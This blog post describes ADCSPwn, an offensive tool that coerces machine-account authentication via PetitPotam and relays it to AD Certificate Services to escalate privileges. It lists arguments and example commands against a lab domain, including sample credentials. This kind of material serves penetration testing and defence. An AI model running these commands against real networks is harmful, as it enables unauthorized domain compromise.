ADCSPwn : A Tool To Escalate Privileges In An Active Directory Network By Coercing Authenticate From Machine Accounts And Relaying To The Certificate Service

ADCSPwn is a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts (Petitpotam) and relaying to the certificate service.

Usage

Run ADCSPwn on your target network.

Author: @batsec – MDSec ActiveBreach
Contributor: @Flangvik – TrustedSec
adcspwn.exe –adcs –port [local port] –remote [computer]
Required arguments:
adcs – This is the address of the AD CS server which authentication will be relayed to.
Optional arguments:
port – The port ADCSPwn will listen on.
remote – Remote machine to trigger authentication from.
username – Username for non-domain context.
password – Password for non-domain context.
dc – Domain controller to query for Certificate Templates (LDAP).
unc – Set custom UNC callback path for EfsRpcOpenFileRaw (Petitpotam) .
output – Output path to store base64 generated crt.
Example usage:
adcspwn.exe –adcs cs.pwnlab.local
adcspwn.exe –adcs cs.pwnlab.local –port 9001
adcspwn.exe –adcs cs.pwnlab.local –remote dc.pwnlab.local
adcspwn.exe –adcs cs.pwnlab.local –remote dc.pwnlab.local –port 9001
adcspwn.exe –adcs cs.pwnlab.local –remote dc.pwnlab.local –output C:\Temp\cert_b64.txt
adcspwn.exe –adcs cs.pwnlab.local –remote dc.pwnlab.local –username pwnlab.local\mranderson –password The0nly0ne! –dc dc.pwnlab.local
adcspwn.exe –adcs cs.pwnlab.local –remote dc.pwnlab.local –dc dc.pwnlab.local –unc \WIN-WORK01.pwnlab.local\made\up\share

R K

Recent Posts

cp Command: Copy Files and Directories in Linux

The cp command, short for "copy," is the main Linux utility for duplicating files and directories. Whether…

1 week ago

Image OSINT

Introduction In digital investigations, images often hold more information than meets the eye. With the…

1 week ago

cat Command: Read and Combine File Contents in Linux

The cat command short for concatenate, It is a fast and versatile tool for viewing and merging…

1 week ago

Port In Networking

What is a Port? A port in networking acts like a gateway that directs data…

1 week ago

ls Command: List Directory Contents in Linux

The ls command is fundamental for anyone working with Linux. It’s used to display the files and…

1 week ago

pwd Command: Find Your Location in Linux

The pwd (Print Working Directory) command is essential for navigating the Linux filesystem. It instantly shows your…

2 weeks ago